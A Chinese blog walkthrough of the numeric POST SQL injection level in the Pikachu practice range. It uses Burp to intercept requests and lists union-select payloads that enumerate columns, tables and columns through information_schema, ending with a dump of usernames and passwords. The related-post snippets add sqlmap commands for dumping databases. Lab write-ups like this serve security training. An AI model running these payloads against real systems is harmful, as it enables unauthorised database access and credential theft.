Pikachu靶场-SQL注入-数字型注入(post)过关步骤

已于 2022-07-16 15:07:54 修改
阅读量925 收藏 16
点赞数 3
分类专栏: # 渗透靶场 文章标签: sql 安全 SQL注入-数字型注入 Pikachu靶场 SQL注入
于 2022-07-16 11:10:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44257023/article/details/125816558
版权

Pikachu靶场-SQL注入-数字型注入(post)过关步骤

通过看这关的名称,就知道它的参数是数字并且提交方式是 post 提交,那么就需要burp这种工具来抓包修改注入了
在这里插入图片描述

寻找注入点

在这里插入图片描述

使用burp抓包看到参数就一个id 注入点应该就是这里了,那个submit参数不用管这是个提交表单时自加入的参数(但切记不要删除掉submit参数)
然后将这个包发到 Repeater(重发器)模块中,进行下一步注入,手工闭合就一个个的去试,这关就没有闭合,直接注入 详情看动图:
在这里插入图片描述
数值相等正常显示,数值不相等不正常显示

判断有多少个字段数

这里就不用多说,直接 order by 试就行,这关字段数是 2,具体看动图:
在这里插入图片描述

展示显错位

知道了字段数,那么接下来就用union select 11,22 -- bbq 展示显错位了具体看动图:(不出结果将查询参数变为,查询不到的参数)
在这里插入图片描述

查询当前数据库

version()查看数据库版本 ,database()查看当前数据库

union select version() ,database() -- bbq

具体看动图:(不出结果将查询参数变为,查询不到的参数)
在这里插入图片描述

查询出数据库中的所有表

使用 union select table_name,22 from information_schema.tables where table_schema=database() -- bbq 得到当前数据库所有表名,具体看动图:(不出结果将查询参数变为,查询不到的参数)
在这里插入图片描述

查询指定的表中的列名

查询出表名下一步就是,查询字段也就是列名称使用 union select column_name,22 from information_schema.columns where table_schema='pikachu' and table_name='users' -- bbq 语句查询,具体看动图:(不出结果将查询参数变为,查询不到的参数)
在这里插入图片描述

查询数据

当经过以上步骤,已经知道了数据库名、表名、字段名,那么就可以查询我们需要的数据了,具体看动图:(不出结果将查询参数变为,查询不到的参数)

union select username,password from users -- bbq

在这里插入图片描述
看到密码就去解密就行了,到这里就完成通关了!

常家壮
关注
  • 3
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
pikachu靶场SQL注入.docx
09-13
pikachu靶场SQL注入章节解题
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
pikachu靶场第十六关——sqli数字型注入post)(附代码审计)
最新发布
yzasts的博客
04-15 1066
在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。在构建代码时,一般会从如下几个方面的策略来防止SQL注入漏洞:1.对传进SQL语句里面的变量进行过滤,不允许危险字符传入;
WEB渗透学习-pikachu靶场练习
04-20
pikachu是一个开源靶场,适用于新手学习WEB安全时练习使用,内涵XSS漏洞、sql注入漏洞、SEC漏洞、文件上传(下载)漏洞、文件包含漏洞以及越权漏洞等
sql注入 pikachu post数字型注入
08-12
sql注入 pikachu post数字型注入
pikachu-master靶场
07-14
pikachu-master靶场
SQL注入post注入
qq_44886111的博客
12-10 684
SQL注入post注入 本人记录这些为了学习的同时,能够有很好的记录,所谓好记性不如烂笔头,同时发布出来,也是希望大家有朋友学习到这里想上网搜索一些东西,以便借用和探讨一些问题,总之,不断学习!! 自我修养:没有一个系统是安全的 理解 $_GET 变量接受所有以 get 方式发送的请求,及浏览器地址栏中的 ? 之后的内容,执行后地址栏会显示出来。 $_POST 变量接受所有以 post 方式发送的请求,执行后地址栏不会显示出来。 $_REQUEST 支持两种方式发送过来的请求,即 post 和 get 它
pikachu-SQL数字型注入post)2022,超详细
weixin_46497491的博客
09-10 1510
pikachu-SQL数字型注入post)2022,超详细,web渗透,sql注入,渗透测试
皮卡丘(pikachu)SQL注入(手工和工具举例)
weixin_44787832的博客
07-21 4118
我们以数字型(使用sqlmap)和整数型(使用手工注入)举一个例子 数字型注入(POST) 我们使用了sqlmap 选择1点击查询并抓包 将抓下来的数据全部复制在一个记事本里,命名为1.txt 使用命令 python sqlmap.py –r 111.txt –current-db 爆出数据库:pikachu 之后爆破表:python sqlmap.py –r 111.txt –D pikachu -tables 爆出表 在之后找一个表去爆列名 python
sql注入--POST注入
pakho_C的博客
01-04 4328
sql注入POST注入 靶场sqli-labs-master 下载链接:靶场下载链接 POST和GET的区别 GET提交的数据会显示在URL中,POST则不会。这是最显而易见的差别。这点意味着GET更不安全POST也不安全,因为HTTP是明文传输抓包就能获取数据内容,要想安全还得加密) GET回退浏览器无害,POST会再次提交请求(GET方法回退后浏览器再缓存中拿结果,POST每次都会创建新资源) GET提交的数据大小有限制(是因为浏览器对URL的长度有限制,GET本身没有限制),POST没有 GET
pikachu靶场——字符型SQL注入
Mr_Liu___的博客
07-08 203
Pikachu靶场-SQL Inject
qq_53083285的博客
11-10 4760
Pikachu靶场Sql
SQL注入---POST注入
zhoutong2323的博客
04-07 640
在Webshell文章中介绍过post提交和get提交的区别,这里不再赘述get方式提交URL中的参数信息,post方式则是将信息保存在HTTP请求的body中传递get提交的参数可以被缓存并会保留在浏览器的历史记录里,post提交不会。get提交最长2048个字符,而post提交没有长度限制综上所述,post方式提交的数据保密性更强,因此登录界面输入的账号密码信息常用post方式提交。
SQL注入实操(get、post基于报错的注入sqlilabs靶场
ting_liang的博客
01-20 811
1、利用order by 判断字段数正确?id=1' 报错?id=1' order by 3 --+ (编号为3正确)------可以看出为3个字段(编号为4错误)2、union联合注入?id=0(不存在这样的记录,查不到的意思)(报错)?id=0' union select 1,2,3 --+ (联合查询前面查3个后面查3个)?id=0' union select 1,database(),user() --+ 报: 数据库名 用户名?
sql注入靶场安装/POST注入基础/一看就会
ChenD的学习笔记
10-05 776
SQL注入(二)post注入方法
通关pikaqu靶场sql注入数字型(一)
Alphamilk的博客
03-21 289
通过burp suite实现对目标网站sql注入,得到所有用户的数据
Pikachu靶场——SQL注入漏洞
来日可期的博客
10-06 1504
SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。
Pikachu靶场通关笔记--Sql Inject(SQL注入)
weixin_45908624的博客
12-09 2731
sql注入
pikachu靶场通关sql注入
08-10
Pikachu靶场中,SQL注入是一种常见的攻击方法。参与者可以通过注入恶意代码来绕过应用程序的安全性,从而获取敏感信息或者对数据库进行修改。在注入过程中,可以使用不同的技术和payload来实现攻击。例如,数字型注入、字符型注入、搜索型注入、XX型注入、insert注入、delete注入、http header注入、盲注和宽字节注入等。你也可以使用Python脚本来进行注入测试,根据注入类型和目标网址构造合适的payload来发送请求123 #### 引用[.reference_title] - *1* [Pikachu靶场sql注入通关](https://blog.csdn.net/oiadkt/article/details/129385178)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [pikachu靶场通关之sql注入系列](https://blog.csdn.net/qq_51902218/article/details/120333234)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值